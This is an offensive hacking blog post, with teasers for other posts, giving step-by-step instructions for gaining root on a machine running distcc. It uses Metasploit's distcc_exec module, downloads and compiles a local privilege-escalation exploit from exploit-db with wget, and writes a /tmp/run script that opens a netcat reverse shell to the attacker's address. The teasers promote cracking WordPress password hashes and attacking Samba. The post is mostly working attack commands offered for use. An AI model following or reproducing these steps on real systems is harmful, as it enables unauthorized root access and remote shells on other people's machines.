[Video] Local Exploit Privilege Escalation

-
Hay guys
tonight i will share how to get root privileges to start utilizing the vulnerability gap that exists on the machine "distcc".

about distcc:
Distcc is designed to speed up compilation by taking advantage of unused processing on another computer.

How to :

1. scann the target using the command:
nmap -p 1-56635 -sS target-ip-addr

then look for port 3633 (distccd)

2. Open your metasploit and enter this command:
msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > set RHOST 192.168.1.10
RHOST => 192.168.1.10
msf exploit(distcc_exec) > set PAYLOAD cmd/unix/bind_ruby
PAYLOAD => cmd/unix/bind_ruby
msf exploit(distcc_exec) > exploit

wait until the command shell session opened

3. then use this command :
uname -r (kernel version)
whoami (print the user name associated with the current effective user ID)

this stage we do not get user id root.
so, let's get started privilege escalation

make sure the kernel version used the victim is "2.6"
take exploit provided by exploit-db (http://www.exploit-db.com/download/8572) to gain root privileges

  * wget http://www.exploit-db.com/download/8572
  * mv index.html exploit.c or exploit name
  * gcc -o exploit exploit.c or exploit name

The next step to create a script that will be run by an exploit that we have to compile the above:
echo '#!/bin/bash' > /tmp/run
echo '/bin/netcat -e /bin/bash your-ip-addr 4444' >> /tmp/run

NOTE : Why we must save it in the directory /tmp/ with the name "run" ?

The following reasons which I will explain:
on the script "http://www.exploit-db.com/download/8572" there is a command that will be executed when we run the exploitation. for screenshot:

the next step
  * open the new tab terminal console and create a Netcat session
     * netcat -vlp 4444
  * ps (to display the information from the active-process)
     * ps -edf | grep udev

remember. PID was used at different values ​​such as: 
next lower PID 2290-1 = 2289 (Ex., ./exploit-name 2289)

after executed, notice that we have run Netcat before then type the following command to see whether we succeed or not:
  * id
  * whoami

The following video I had prepared :

Regards
Hidemichi-Hiroyuki a.k.a [H2]

Comments

Post a Comment

Do Not Fuckin Spamming

Popular posts from this blog

Decrypt MD5 $Wordpress

-
Image
Hy, I'm back again. I will discuss how to Decrypt a password in the form the MD5 hash wordpress. here are some examples of hash md5 encryption wordpress will we Decrypt: HASH                                                                                  PASS $P$BDHjLCEroc8ujkcs8RZxOhcE80aV5h.           : th3sweety0ne  $P$BPXNfl3mZiO7PZc4XZqFFjX7TyP7Lh.           : Pabl0-saChez $P$BqilSln8PD9SBFuTx8KkaXz62aIIvV/             : m4rim4r123 $P$BnfObieGq5ygdt0OMgwbnKvFt8EFUs.          : Gh0stTrac3 $P$B.RwpJQV8ANOyl19RGHhCaYYgJyvQM1  : *12345*0a0b0c0d many of my friends are overwhelmed when decrypt wordpress md5 hash. so are they wasting their jobs because the...
Read more

Exploit Samba "SmbClient"

-
Image
Such as FTP (File Transfer Protocol) samba include things like getting files from the server to the local machine, putting files from the local machine to the server, retrieving directory information from the server and so on. in this case we have to get the victim to allow shared folders or files. Equipments : 1. SmbClient 2. Nmap 3. Metasploit The firstStep. scanning port the victim's ip-address using Nmap. in here that we need right port is port   445  microsoft-ds. # Nmap (Victim Ip-Address) seen in the picture above. I am lucky :) now, let us look the contents of the port # nmap -p445 --script=smb-os-discovery (Victim Ip-Address) --script=smb-os-discovery : Attempts to determine the operating system, computer name, domain, workgroup, and current time over the SMB protocol (ports 445 or 139) . seen in the picture above, it turns out the victim we use Operating System Windows 7 Ultimate.  Computer Name And NetBIOS Name is a ANONYMOUS-...
Read more

Configure Pure-FTP on Kali Linux

-
Image
FTP or file transfer protocol is a protocol that allows you to transfer files to and from a remote machine. BackTrack has pure-FTPd installed by default. FTP operates on port 21. Contents : 1. Installasion 2. Configuration 3. Run Installation Pure-Ftpd # apt-get install pure-ftpd Installation Success =)) Configure Ftpd add new group: # groupadd ftpgroup add user: # useradd -g ftpgroup -d /dev/null -s /etc ftpuser -g =  name or ID of the primary group of the new account -d = home directory of the new account -s = login shell of the new account configure store a list of users: # pure-pw useradd myftp -u ftpuser -d /home/ftp/pub/myftp myftp = your ftp username please enter you password. configure puredb database file # pure-pw mkdb The next entry to the directory /etc/pure-ftpd/auth/ # cd /etc/pure-ftpd/auth then Create hard links by default: # ln -s ../conf/PureDB 60pdb then, make a directory /ftp...
Read more